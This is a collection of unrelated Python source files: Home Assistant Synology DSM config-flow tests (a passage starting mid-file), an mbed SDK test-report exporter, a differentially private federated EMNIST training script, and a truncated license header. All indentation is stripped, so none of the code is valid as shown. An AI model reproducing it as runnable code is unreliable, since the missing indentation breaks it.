assert result["data"][CONF_SSL] == USE_SSL
assert result["data"][CONF_VERIFY_SSL] == VERIFY_SSL
assert result["data"][CONF_USERNAME] == USERNAME
assert result["data"][CONF_PASSWORD] == PASSWORD
assert result["data"][CONF_MAC] == MACS
assert result["data"].get("device_token") is None
assert result["data"].get(CONF_DISKS) is None
assert result["data"].get(CONF_VOLUMES) is None
async def test_reauth(hass: HomeAssistant, service: MagicMock):
"""Test reauthentication."""
entry = MockConfigEntry(
domain=DOMAIN,
data={
CONF_HOST: HOST,
CONF_USERNAME: USERNAME,
CONF_PASSWORD: f"{PASSWORD}_invalid",
},
unique_id=SERIAL,
)
entry.add_to_hass(hass)
with patch(
"homeassistant.config_entries.ConfigEntries.async_reload",
return_value=True,
):
result = await hass.config_entries.flow.async_init(
DOMAIN,
context={
"source": SOURCE_REAUTH,
"entry_id": entry.entry_id,
"unique_id": entry.unique_id,
},
data={
CONF_HOST: HOST,
CONF_USERNAME: USERNAME,
CONF_PASSWORD: PASSWORD,
},
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "reauth_confirm"
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
{
CONF_USERNAME: USERNAME,
CONF_PASSWORD: PASSWORD,
},
)
assert result["type"] == data_entry_flow.RESULT_TYPE_ABORT
assert result["reason"] == "reauth_successful"
async def test_reconfig_user(hass: HomeAssistant, service: MagicMock):
"""Test re-configuration of already existing entry by user."""
MockConfigEntry(
domain=DOMAIN,
data={
CONF_HOST: "wrong_host",
CONF_USERNAME: USERNAME,
CONF_PASSWORD: PASSWORD,
},
unique_id=SERIAL,
).add_to_hass(hass)
with patch(
"homeassistant.config_entries.ConfigEntries.async_reload",
return_value=True,
):
result = await hass.config_entries.flow.async_init(
DOMAIN,
context={"source": SOURCE_USER},
data={CONF_HOST: HOST, CONF_USERNAME: USERNAME, CONF_PASSWORD: PASSWORD},
)
assert result["type"] == data_entry_flow.RESULT_TYPE_ABORT
assert result["reason"] == "reconfigure_successful"
async def test_login_failed(hass: HomeAssistant, service: MagicMock):
"""Test when we have errors during login."""
service.return_value.login = Mock(
side_effect=(SynologyDSMLoginInvalidException(USERNAME))
)
result = await hass.config_entries.flow.async_init(
DOMAIN,
context={"source": SOURCE_USER},
data={CONF_HOST: HOST, CONF_USERNAME: USERNAME, CONF_PASSWORD: PASSWORD},
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["errors"] == {CONF_USERNAME: "invalid_auth"}
async def test_connection_failed(hass: HomeAssistant, service: MagicMock):
"""Test when we have errors during connection."""
service.return_value.login = Mock(
side_effect=SynologyDSMRequestException(IOError("arg"))
)
result = await hass.config_entries.flow.async_init(
DOMAIN,
context={"source": SOURCE_USER},
data={CONF_HOST: HOST, CONF_USERNAME: USERNAME, CONF_PASSWORD: PASSWORD},
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["errors"] == {CONF_HOST: "cannot_connect"}
async def test_unknown_failed(hass: HomeAssistant, service: MagicMock):
"""Test when we have an unknown error."""
service.return_value.login = Mock(side_effect=SynologyDSMException(None, None))
result = await hass.config_entries.flow.async_init(
DOMAIN,
context={"source": SOURCE_USER},
data={CONF_HOST: HOST, CONF_USERNAME: USERNAME, CONF_PASSWORD: PASSWORD},
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["errors"] == {"base": "unknown"}
async def test_missing_data_after_login(hass: HomeAssistant, service_failed: MagicMock):
"""Test when we have errors during connection."""
result = await hass.config_entries.flow.async_init(
DOMAIN,
context={"source": SOURCE_USER},
data={CONF_HOST: HOST, CONF_USERNAME: USERNAME, CONF_PASSWORD: PASSWORD},
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["errors"] == {"base": "missing_data"}
async def test_form_ssdp(hass: HomeAssistant, service: MagicMock):
"""Test we can setup from ssdp."""
result = await hass.config_entries.flow.async_init(
DOMAIN,
context={"source": SOURCE_SSDP},
data=ssdp.SsdpServiceInfo(
ssdp_usn="mock_usn",
ssdp_st="mock_st",
ssdp_location="http://192.168.1.5:5000",
upnp={
ssdp.ATTR_UPNP_FRIENDLY_NAME: "mydsm",
ssdp.ATTR_UPNP_SERIAL: "001132XXXX99", # MAC address, but SSDP does not have `-`
},
),
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "link"
assert result["errors"] == {}
result = await hass.config_entries.flow.async_configure(
result["flow_id"], {CONF_USERNAME: USERNAME, CONF_PASSWORD: PASSWORD}
)
assert result["type"] == data_entry_flow.RESULT_TYPE_CREATE_ENTRY
assert result["result"].unique_id == SERIAL
assert result["title"] == "192.168.1.5"
assert result["data"][CONF_HOST] == "192.168.1.5"
assert result["data"][CONF_PORT] == 5001
assert result["data"][CONF_SSL] == DEFAULT_USE_SSL
assert result["data"][CONF_VERIFY_SSL] == DEFAULT_VERIFY_SSL
assert result["data"][CONF_USERNAME] == USERNAME
assert result["data"][CONF_PASSWORD] == PASSWORD
assert result["data"][CONF_MAC] == MACS
assert result["data"].get("device_token") is None
assert result["data"].get(CONF_DISKS) is None
assert result["data"].get(CONF_VOLUMES) is None
async def test_reconfig_ssdp(hass: HomeAssistant, service: MagicMock):
"""Test re-configuration of already existing entry by ssdp."""
MockConfigEntry(
domain=DOMAIN,
data={
CONF_HOST: "wrong_host",
CONF_VERIFY_SSL: VERIFY_SSL,
CONF_USERNAME: USERNAME,
CONF_PASSWORD: PASSWORD,
CONF_MAC: MACS,
},
unique_id=SERIAL,
).add_to_hass(hass)
result = await hass.config_entries.flow.async_init(
DOMAIN,
context={"source": SOURCE_SSDP},
data=ssdp.SsdpServiceInfo(
ssdp_usn="mock_usn",
ssdp_st="mock_st",
ssdp_location="http://192.168.1.5:5000",
upnp={
ssdp.ATTR_UPNP_FRIENDLY_NAME: "mydsm",
ssdp.ATTR_UPNP_SERIAL: "001132XXXX59", # Existing in MACS[0], but SSDP does not have `-`
},
),
)
assert result["type"] == data_entry_flow.RESULT_TYPE_ABORT
assert result["reason"] == "reconfigure_successful"
async def test_skip_reconfig_ssdp(hass: HomeAssistant, service: MagicMock):
"""Test re-configuration of already existing entry by ssdp."""
MockConfigEntry(
domain=DOMAIN,
data={
CONF_HOST: "wrong_host",
CONF_VERIFY_SSL: True,
CONF_USERNAME: USERNAME,
CONF_PASSWORD: PASSWORD,
CONF_MAC: MACS,
},
unique_id=SERIAL,
).add_to_hass(hass)
result = await hass.config_entries.flow.async_init(
DOMAIN,
context={"source": SOURCE_SSDP},
data=ssdp.SsdpServiceInfo(
ssdp_usn="mock_usn",
ssdp_st="mock_st",
ssdp_location="http://192.168.1.5:5000",
upnp={
ssdp.ATTR_UPNP_FRIENDLY_NAME: "mydsm",
ssdp.ATTR_UPNP_SERIAL: "001132XXXX59", # Existing in MACS[0], but SSDP does not have `-`
},
),
)
assert result["type"] == data_entry_flow.RESULT_TYPE_ABORT
assert result["reason"] == "already_configured"
async def test_existing_ssdp(hass: HomeAssistant, service: MagicMock):
"""Test abort of already existing entry by ssdp."""
MockConfigEntry(
domain=DOMAIN,
data={
CONF_HOST: "192.168.1.5",
CONF_VERIFY_SSL: VERIFY_SSL,
CONF_USERNAME: USERNAME,
CONF_PASSWORD: PASSWORD,
CONF_MAC: MACS,
},
unique_id=SERIAL,
).add_to_hass(hass)
result = await hass.config_entries.flow.async_init(
DOMAIN,
context={"source": SOURCE_SSDP},
data=ssdp.SsdpServiceInfo(
ssdp_usn="mock_usn",
ssdp_st="mock_st",
ssdp_location="http://192.168.1.5:5000",
upnp={
ssdp.ATTR_UPNP_FRIENDLY_NAME: "mydsm",
ssdp.ATTR_UPNP_SERIAL: "001132XXXX59", # Existing in MACS[0], but SSDP does not have `-`
},
),
)
assert result["type"] == data_entry_flow.RESULT_TYPE_ABORT
assert result["reason"] == "already_configured"
async def test_options_flow(hass: HomeAssistant, service: MagicMock):
"""Test config flow options."""
config_entry = MockConfigEntry(
domain=DOMAIN,
data={
CONF_HOST: HOST,
CONF_USERNAME: USERNAME,
CONF_PASSWORD: PASSWORD,
CONF_MAC: MACS,
},
unique_id=SERIAL,
)
config_entry.add_to_hass(hass)
assert config_entry.options == {}
result = await hass.config_entries.options.async_init(config_entry.entry_id)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "init"
# Scan interval
# Default
result = await hass.config_entries.options.async_configure(
result["flow_id"],
user_input={},
)
assert result["type"] == data_entry_flow.RESULT_TYPE_CREATE_ENTRY
assert config_entry.options[CONF_SCAN_INTERVAL] == DEFAULT_SCAN_INTERVAL
assert config_entry.options[CONF_TIMEOUT] == DEFAULT_TIMEOUT
# Manual
result = await hass.config_entries.options.async_init(config_entry.entry_id)
result = await hass.config_entries.options.async_configure(
result["flow_id"],
user_input={CONF_SCAN_INTERVAL: 2, CONF_TIMEOUT: 30},
)
assert result["type"] == data_entry_flow.RESULT_TYPE_CREATE_ENTRY
assert config_entry.options[CONF_SCAN_INTERVAL] == 2
assert config_entry.options[CONF_TIMEOUT] == 30
|
|
"""
mbed SDK
Copyright (c) 2011-2014 ARM Limited
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Author: Przemyslaw Wirkus <[email protected]>
"""
from tools.utils import construct_enum, mkdir
from prettytable import PrettyTable
import os
ResultExporterType = construct_enum(HTML='Html_Exporter',
JUNIT='JUnit_Exporter',
JUNIT_OPER='JUnit_Exporter_Interoperability',
BUILD='Build_Exporter',
TEXT='Text_Exporter',
PRINT='Print_Exporter')
class ReportExporter(object):
""" Class exports extended test result Python data structure to
different formats like HTML, JUnit XML.
Parameter 'test_result_ext' format:
u'uARM': { u'LPC1768': { 'MBED_2': { 0: { 'copy_method': 'shutils.copy()',
'duration': 20,
'elapsed_time': 1.7929999828338623,
'output': 'Host test instrumentation on ...\r\n',
'result': 'OK',
'target_name': u'LPC1768',
'description': 'stdio',
'id': u'MBED_2',
'toolchain_name': u'uARM'}},
"""
CSS_STYLE = """<style>
.name{
border: 1px solid;
border-radius: 25px;
width: 100px;
}
.tooltip{
position:absolute;
background-color: #F5DA81;
display:none;
}
</style>
"""
JAVASCRIPT = """
<script type="text/javascript">
function show (elem) {
elem.style.display = "block";
}
function hide (elem) {
elem.style.display = "";
}
</script>
"""
def __init__(self, result_exporter_type, package="test"):
self.result_exporter_type = result_exporter_type
self.package = package
def report(self, test_summary_ext, test_suite_properties=None,
print_log_for_failures=True):
""" Invokes report depending on exporter_type set in constructor
"""
if self.result_exporter_type == ResultExporterType.HTML:
# HTML exporter
return self.exporter_html(test_summary_ext, test_suite_properties)
elif self.result_exporter_type == ResultExporterType.JUNIT:
# JUNIT exporter for results from test suite
return self.exporter_junit(test_summary_ext, test_suite_properties)
elif self.result_exporter_type == ResultExporterType.JUNIT_OPER:
# JUNIT exporter for interoperability test
return self.exporter_junit_ioper(test_summary_ext, test_suite_properties)
elif self.result_exporter_type == ResultExporterType.PRINT:
# Print exporter
return self.exporter_print(test_summary_ext, print_log_for_failures=print_log_for_failures)
elif self.result_exporter_type == ResultExporterType.TEXT:
return self.exporter_text(test_summary_ext)
return None
def report_to_file(self, test_summary_ext, file_name, test_suite_properties=None):
""" Stores report to specified file
"""
report = self.report(test_summary_ext, test_suite_properties=test_suite_properties)
self.write_to_file(report, file_name)
def write_to_file(self, report, file_name):
if report is not None:
dirname = os.path.dirname(file_name)
if dirname:
mkdir(dirname)
with open(file_name, 'w') as f:
f.write(report)
def get_tooltip_name(self, toolchain, target, test_id, loop_no):
""" Generate simple unique tool-tip name which can be used.
For example as HTML <div> section id attribute.
"""
return "target_test_%s_%s_%s_%s"% (toolchain.lower(), target.lower(), test_id.lower(), loop_no)
def get_result_div_sections(self, test, test_no):
""" Generates separate <DIV> sections which contains test results output.
"""
RESULT_COLORS = {'OK': 'LimeGreen',
'FAIL': 'Orange',
'ERROR': 'LightCoral',
'OTHER': 'LightGray',
}
tooltip_name = self.get_tooltip_name(test['toolchain_name'], test['target_name'], test['id'], test_no)
background_color = RESULT_COLORS[test['result'] if test['result'] in RESULT_COLORS else 'OTHER']
result_div_style = "background-color: %s"% background_color
result = """<div class="name" style="%s" onmouseover="show(%s)" onmouseout="hide(%s)">
<center>%s</center>
<div class = "tooltip" id= "%s">
<b>%s</b><br />
<hr />
<b>%s</b> in <b>%.2f sec</b><br />
<hr />
<small>
%s
</small>
</div>
</div>
"""% (result_div_style,
tooltip_name,
tooltip_name,
test['result'],
tooltip_name,
test['target_name_unique'],
test['description'],
test['elapsed_time'],
test['output'].replace('\n', '<br />'))
return result
def get_result_tree(self, test_results):
""" If test was run in a loop (we got few results from the same test)
we will show it in a column to see all results.
This function produces HTML table with corresponding results.
"""
result = ''
for i, test_result in enumerate(test_results):
result += '<table>'
test_ids = sorted(test_result.keys())
for test_no in test_ids:
test = test_result[test_no]
result += """<tr>
<td valign="top">%s</td>
</tr>"""% self.get_result_div_sections(test, "%d_%d" % (test_no, i))
result += '</table>'
return result
def get_all_unique_test_ids(self, test_result_ext):
""" Gets all unique test ids from all ran tests.
We need this to create complete list of all test ran.
"""
result = []
targets = test_result_ext.keys()
for target in targets:
toolchains = test_result_ext[target].keys()
for toolchain in toolchains:
tests = test_result_ext[target][toolchain].keys()
result.extend(tests)
return sorted(list(set(result)))
#
# Exporters functions
#
def exporter_html(self, test_result_ext, test_suite_properties=None):
""" Export test results in proprietary HTML format.
"""
result = """<html>
<head>
<title>mbed SDK test suite test result report</title>
%s
%s
</head>
<body>
"""% (self.CSS_STYLE, self.JAVASCRIPT)
unique_test_ids = self.get_all_unique_test_ids(test_result_ext)
targets = sorted(test_result_ext.keys())
result += '<table>'
for target in targets:
toolchains = sorted(test_result_ext[target].keys())
for toolchain in toolchains:
result += '<tr>'
result += '<td></td>'
result += '<td></td>'
tests = sorted(test_result_ext[target][toolchain].keys())
for test in unique_test_ids:
result += """<td align="center">%s</td>"""% test
result += """</tr>
<tr>
<td valign="center">%s</td>
<td valign="center"><b>%s</b></td>
"""% (toolchain, target)
for test in unique_test_ids:
test_result = self.get_result_tree(test_result_ext[target][toolchain][test]) if test in tests else ''
result += '<td>%s</td>'% (test_result)
result += '</tr>'
result += '</table>'
result += '</body></html>'
return result
def exporter_junit_ioper(self, test_result_ext, test_suite_properties=None):
from junit_xml import TestSuite, TestCase
test_suites = []
test_cases = []
for platform in sorted(test_result_ext.keys()):
# test_result_ext[platform] is a list of (result, name, scope, description) tuples
test_cases = []
for tr_result in test_result_ext[platform]:
result, name, scope, description = tr_result
classname = 'test.ioper.%s.%s.%s' % (platform, name, scope)
elapsed_sec = 0
_stdout = description
_stderr = ''
# Test case
tc = TestCase(name, classname, elapsed_sec, _stdout, _stderr)
# Test case extra failure / error info
if result == 'FAIL':
tc.add_failure_info(description, _stdout)
elif result == 'ERROR':
tc.add_error_info(description, _stdout)
elif result == 'SKIP' or result == 'NOT_SUPPORTED':
tc.add_skipped_info(description, _stdout)
test_cases.append(tc)
ts = TestSuite("test.suite.ioper.%s" % (platform), test_cases)
test_suites.append(ts)
return TestSuite.to_xml_string(test_suites)
def exporter_junit(self, test_result_ext, test_suite_properties=None):
""" Export test results in JUnit XML compliant format
"""
from junit_xml import TestSuite, TestCase
test_suites = []
test_cases = []
targets = sorted(test_result_ext.keys())
for target in targets:
toolchains = sorted(test_result_ext[target].keys())
for toolchain in toolchains:
test_cases = []
tests = sorted(test_result_ext[target][toolchain].keys())
for test in tests:
test_results = test_result_ext[target][toolchain][test]
for test_res in test_results:
test_ids = sorted(test_res.keys())
for test_no in test_ids:
test_result = test_res[test_no]
name = test_result['description']
classname = '%s.%s.%s.%s'% (self.package, target, toolchain, test_result['id'])
elapsed_sec = test_result['elapsed_time']
_stdout = test_result['output']
if 'target_name_unique' in test_result:
_stderr = test_result['target_name_unique']
else:
_stderr = test_result['target_name']
# Test case
tc = TestCase(name, classname, elapsed_sec, _stdout, _stderr)
# Test case extra failure / error info
message = test_result['result']
if test_result['result'] == 'FAIL':
tc.add_failure_info(message, _stdout)
elif test_result['result'] == 'SKIP' or test_result["result"] == 'NOT_SUPPORTED':
tc.add_skipped_info(message, _stdout)
elif test_result['result'] != 'OK':
tc.add_error_info(message, _stdout)
test_cases.append(tc)
ts = TestSuite("test.suite.%s.%s"% (target, toolchain), test_cases, properties=test_suite_properties[target][toolchain])
test_suites.append(ts)
return TestSuite.to_xml_string(test_suites)
def exporter_print_helper(self, array, print_log=False):
for item in array:
print(" * %s::%s::%s" % (item["target_name"],
item["toolchain_name"],
item["id"]))
if print_log:
log_lines = item["output"].split("\n")
for log_line in log_lines:
print(" %s" % log_line)
def exporter_print(self, test_result_ext, print_log_for_failures=False):
""" Export test results in print format.
"""
failures = []
skips = []
successes = []
unique_test_ids = self.get_all_unique_test_ids(test_result_ext)
targets = sorted(test_result_ext.keys())
for target in targets:
toolchains = sorted(test_result_ext[target].keys())
for toolchain in toolchains:
tests = sorted(test_result_ext[target][toolchain].keys())
for test in tests:
test_runs = test_result_ext[target][toolchain][test]
for test_runner in test_runs:
#test_run = test_result_ext[target][toolchain][test][test_run_number][0]
test_run = test_runner[0]
if "result" in test_run:
if test_run["result"] == "FAIL":
failures.append(test_run)
elif test_run["result"] == "SKIP" or test_run["result"] == "NOT_SUPPORTED":
skips.append(test_run)
elif test_run["result"] == "OK":
successes.append(test_run)
else:
raise Exception("Unhandled result type: %s" % (test_run["result"]))
else:
raise Exception("'test_run' did not have a 'result' value")
if successes:
print("\n\nBuild successes:")
self.exporter_print_helper(successes)
if skips:
print("\n\nBuild skips:")
self.exporter_print_helper(skips)
if failures:
print("\n\nBuild failures:")
self.exporter_print_helper(failures, print_log=print_log_for_failures)
return False
else:
return True
def exporter_text(self, test_result_ext):
""" Prints well-formed summary with results (SQL table like)
table shows target x test results matrix across
"""
success_code = 0 # Success code that can be leter returned to
# Pretty table package is used to print results
pt = PrettyTable(["Result", "Target", "Toolchain", "Test ID", "Test Description",
"Elapsed Time", "Timeout"])
pt.align["Result"] = "l" # Left align
pt.align["Target"] = "l" # Left align
pt.align["Toolchain"] = "l" # Left align
pt.align["Test ID"] = "l" # Left align
pt.align["Test Description"] = "l" # Left align
pt.padding_width = 1 # One space between column edges and contents (default)
result_dict = {"OK" : 0,
"FAIL" : 0,
"ERROR" : 0,
"UNDEF" : 0,
"IOERR_COPY" : 0,
"IOERR_DISK" : 0,
"IOERR_SERIAL" : 0,
"TIMEOUT" : 0,
"NO_IMAGE" : 0,
"MBED_ASSERT" : 0,
"BUILD_FAILED" : 0,
"NOT_SUPPORTED" : 0
}
unique_test_ids = self.get_all_unique_test_ids(test_result_ext)
targets = sorted(test_result_ext.keys())
for target in targets:
toolchains = sorted(test_result_ext[target].keys())
for toolchain in toolchains:
test_cases = []
tests = sorted(test_result_ext[target][toolchain].keys())
for test in tests:
test_results = test_result_ext[target][toolchain][test]
for test_res in test_results:
test_ids = sorted(test_res.keys())
for test_no in test_ids:
test_result = test_res[test_no]
result_dict[test_result['result']] += 1
pt.add_row([test_result['result'],
test_result['target_name'],
test_result['toolchain_name'],
test_result['id'],
test_result['description'],
test_result['elapsed_time'],
test_result['duration']])
result = pt.get_string()
result += "\n"
# Print result count
result += "Result: " + ' / '.join(['%s %s' % (value, key) for (key, value) in {k: v for k, v in result_dict.items() if v != 0}.items()])
return result
|
|
# Copyright 2021, Google LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Trains and evaluates EMNIST."""
import collections
import functools
from absl import app
from absl import flags
from absl import logging
import numpy as np
import tensorflow as tf
import tensorflow_federated as tff
from dp_ftrl import dp_fedavg
from dp_ftrl import optimizer_utils
from dp_ftrl import training_loop
TEST_BATCH_SIZE = 1024
IRRELEVANT_FLAGS = frozenset(iter(flags.FLAGS))
flags.DEFINE_string(
'experiment_name', 'emnist', 'The name of this experiment. Will be '
'appended to --root_output_dir to separate experiment results.')
flags.DEFINE_string('root_output_dir', '/tmp/dpftrl/emnist',
'Root directory for writing experiment output.')
flags.DEFINE_integer('rounds_per_checkpoint', 100,
'How often to checkpoint the global model.')
flags.DEFINE_integer(
'rounds_per_eval', 20,
'How often to evaluate the global model on the validation dataset.')
flags.DEFINE_integer('clients_per_thread', 1, 'TFF executor configuration.')
# Training
flags.DEFINE_integer('clients_per_round', 100,
'How many clients to sample per round.')
flags.DEFINE_integer('client_epochs_per_round', 1,
'Number of epochs in the client to take per round.')
flags.DEFINE_integer('client_batch_size', 16, 'Batch size used on the client.')
flags.DEFINE_integer('total_rounds', 10, 'Number of total training rounds.')
flags.DEFINE_integer(
'total_epochs', None,
'If not None, use shuffling of clients instead of random sampling.')
flags.DEFINE_enum('client_optimizer', 'sgd', ['sgd'], 'Client optimizer.')
flags.DEFINE_enum('server_optimizer', 'sgd', [
'sgd', 'ftrlprox', 'dpftrlprox', 'dpftrl', 'dpsgd', 'dpsgdm', 'dpftrlm',
'dpftrlproxd'
], 'Server optimizer')
flags.DEFINE_float('client_lr', 0.02, 'Client learning rate.')
flags.DEFINE_float('server_lr', 1.0, 'Server learning rate.')
# optimizer specific
flags.DEFINE_float('server_momentum', 0.9, 'Server momentum.')
flags.DEFINE_float('decay_rate', 0.5,
'Power decay rate for proximal terms in FTRL.')
# Differential privacy
flags.DEFINE_float('clip_norm', 1.0, 'Clip L2 norm.')
flags.DEFINE_float('noise_multiplier', 0.01,
'Noise multiplier for DP algorithm.')
# EMNIST
flags.DEFINE_boolean('only_digits', True,
'If True, use the 10 digits version of EMNIST.')
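# Everything captured in IRRELEVANT_FLAGS was already registered before this
# module's flag declarations, so HPARAM_FLAGS below ends up holding only the
# hyperparameter flags defined above (used for logging and hparam_dict).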
HPARAM_FLAGS = [f for f in flags.FLAGS if f not in IRRELEVANT_FLAGS]
FLAGS = flags.FLAGS
def _get_emnist_dataset(
only_digits: bool,
client_epochs_per_round: int,
client_batch_size: int,
):
"""Loads and preprocesses the EMNIST dataset.
Args:
only_digits: If True, load EMNIST with 10 digits. If False, load EMNIST with
62 characters.
client_epochs_per_round: client local epochs for training.
client_batch_size: client batch size for training.
Returns:
A `(emnist_train, emnist_test)` tuple where `emnist_train` is a
`tff.simulation.datasets.ClientData` object representing the training data
and `emnist_test` is a single `tf.data.Dataset` representing the test data
of all clients.
"""
emnist_train, emnist_test = tff.simulation.datasets.emnist.load_data(
only_digits=only_digits)
def element_fn(element):
return collections.OrderedDict(
x=tf.expand_dims(element['pixels'], -1), y=element['label'])
def preprocess_train_dataset(dataset):
# Use buffer_size same as the maximum client dataset size,
# 418 for Federated EMNIST
return dataset.map(element_fn).shuffle(buffer_size=418).repeat(
count=client_epochs_per_round).batch(
client_batch_size, drop_remainder=False)
def preprocess_test_dataset(dataset):
return dataset.map(element_fn).batch(TEST_BATCH_SIZE, drop_remainder=False)
emnist_train = emnist_train.preprocess(preprocess_train_dataset)
emnist_test = preprocess_test_dataset(
emnist_test.create_tf_dataset_from_all_clients())
return emnist_train, emnist_test
def _server_optimizer_fn(model_weights, name, learning_rate, noise_std):
"""Returns server optimizer."""
model_weight_specs = tf.nest.map_structure(
lambda v: tf.TensorSpec(v.shape, v.dtype), model_weights)
if name == 'sgd':
return optimizer_utils.SGDServerOptimizer(learning_rate)
elif name == 'sgdm':
return optimizer_utils.DPSGDMServerOptimizer(
learning_rate,
momentum=FLAGS.server_momentum,
noise_std=0,
model_weight_specs=model_weight_specs)
elif name == 'dpftrl':
return optimizer_utils.DPFTRLMServerOptimizer(
learning_rate,
momentum=0,
noise_std=noise_std,
model_weight_specs=model_weight_specs)
elif name == 'dpsgd':
return optimizer_utils.DPSGDMServerOptimizer(
learning_rate,
momentum=0,
noise_std=noise_std,
model_weight_specs=model_weight_specs)
elif name == 'dpsgdm':
return optimizer_utils.DPSGDMServerOptimizer(
learning_rate,
momentum=FLAGS.server_momentum,
noise_std=noise_std,
model_weight_specs=model_weight_specs)
elif name == 'dpftrlm':
return optimizer_utils.DPFTRLMServerOptimizer(
learning_rate,
momentum=FLAGS.server_momentum,
noise_std=noise_std,
model_weight_specs=model_weight_specs)
else:
raise ValueError('Unknown server optimizer name {}'.format(name))
def _client_optimizer_fn(name, learning_rate):
if name == 'sgd':
return tf.keras.optimizers.SGD(learning_rate)
else:
raise ValueError('Unknown client optimizer name {}'.format(name))
def _create_original_fedavg_cnn_model(only_digits):
"""The CNN model used in https://arxiv.org/abs/1602.05629.
This function is duplicated from research/optimization/emnist/models.py to
make this example completely stand-alone.
Args:
only_digits: If True, uses a final layer with 10 outputs, for use with the
digits only EMNIST dataset. If False, uses 62 outputs for the larger
dataset.
Returns:
An uncompiled `tf.keras.Model`.
"""
data_format = 'channels_last'
input_shape = [28, 28, 1]
max_pool = functools.partial(
tf.keras.layers.MaxPooling2D,
pool_size=(2, 2),
padding='same',
data_format=data_format)
conv2d = functools.partial(
tf.keras.layers.Conv2D,
kernel_size=5,
padding='same',
data_format=data_format,
activation=tf.nn.relu)
model = tf.keras.models.Sequential([
conv2d(filters=32, input_shape=input_shape),
max_pool(),
conv2d(filters=64),
max_pool(),
tf.keras.layers.Flatten(),
tf.keras.layers.Dense(512, activation=tf.nn.relu),
tf.keras.layers.Dense(10 if only_digits else 62),
tf.keras.layers.Activation(tf.nn.softmax),
])
return model
def _get_client_datasets_fn(train_data):
"""Returns function for client datasets per round."""
if FLAGS.total_epochs is None:
def client_datasets_fn(round_num: int, epoch: int):
del round_num
sampled_clients = np.random.choice(
train_data.client_ids, size=FLAGS.clients_per_round, replace=False)
return [
train_data.create_tf_dataset_for_client(client)
for client in sampled_clients
], epoch
logging.info('Sample clients for max %d rounds', FLAGS.total_rounds)
else:
client_shuffler = training_loop.ClientIDShuffler(FLAGS.clients_per_round,
train_data)
def client_datasets_fn(round_num: int, epoch: int):
sampled_clients, epoch = client_shuffler.sample_client_ids(
round_num, epoch)
return [
train_data.create_tf_dataset_for_client(client)
for client in sampled_clients
], epoch
logging.info('Shuffle clients for max %d epochs and %d rounds',
FLAGS.total_epochs, FLAGS.total_rounds)
return client_datasets_fn
def main(argv):
if len(argv) > 1:
raise app.UsageError('Expected no command-line arguments, '
'got: {}'.format(argv))
client_devices = tf.config.list_logical_devices('GPU')
server_device = tf.config.list_logical_devices('CPU')[0]
tff.backends.native.set_local_python_execution_context(
max_fanout=2 * FLAGS.clients_per_round,
server_tf_device=server_device,
client_tf_devices=client_devices,
clients_per_thread=FLAGS.clients_per_thread)
logging.info('Show FLAGS for debugging:')
for f in HPARAM_FLAGS:
logging.info('%s=%s', f, FLAGS[f].value)
train_data, test_data = _get_emnist_dataset(
FLAGS.only_digits,
FLAGS.client_epochs_per_round,
FLAGS.client_batch_size,
)
def tff_model_fn():
keras_model = _create_original_fedavg_cnn_model(FLAGS.only_digits)
loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=False)
return dp_fedavg.KerasModelWrapper(keras_model, test_data.element_spec,
loss)
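# Noise std handed to the DP server optimizer: the noise multiplier is defined
# relative to the clip norm of a single clipped update, and is divided by
# clients_per_round because the server applies the average (not the sum) of
# the per-client updates.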
noise_std = FLAGS.clip_norm * FLAGS.noise_multiplier / float(
FLAGS.clients_per_round)
server_optimizer_fn = functools.partial(
_server_optimizer_fn,
name=FLAGS.server_optimizer,
learning_rate=FLAGS.server_lr,
noise_std=noise_std)
client_optimizer_fn = functools.partial(
_client_optimizer_fn,
name=FLAGS.client_optimizer,
learning_rate=FLAGS.client_lr)
iterative_process = dp_fedavg.build_federated_averaging_process(
tff_model_fn,
dp_clip_norm=FLAGS.clip_norm,
server_optimizer_fn=server_optimizer_fn,
client_optimizer_fn=client_optimizer_fn)
keras_metrics = [tf.keras.metrics.SparseCategoricalAccuracy()]
model = tff_model_fn()
def evaluate_fn(model_weights, dataset):
model.from_weights(model_weights)
metrics = dp_fedavg.keras_evaluate(model.keras_model, dataset, keras_metrics)
return collections.OrderedDict(
(metric.name, metric.result().numpy()) for metric in metrics)
hparam_dict = collections.OrderedDict([
(name, FLAGS[name].value) for name in HPARAM_FLAGS
])
total_epochs = 0 if FLAGS.total_epochs is None else FLAGS.total_epochs
training_loop.run(
iterative_process,
client_datasets_fn=_get_client_datasets_fn(train_data),
validation_fn=functools.partial(evaluate_fn, dataset=test_data),
total_rounds=FLAGS.total_rounds,
total_epochs=total_epochs,
experiment_name=FLAGS.experiment_name,
train_eval_fn=None,
test_fn=functools.partial(evaluate_fn, dataset=test_data),
root_output_dir=FLAGS.root_output_dir,
hparam_dict=hparam_dict,
rounds_per_eval=FLAGS.rounds_per_eval,
rounds_per_checkpoint=FLAGS.rounds_per_checkpoint,
rounds_per_train_eval=2000)
if __name__ == '__main__':
app.run(main)
|
|
#!/usr/bin/env python3
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
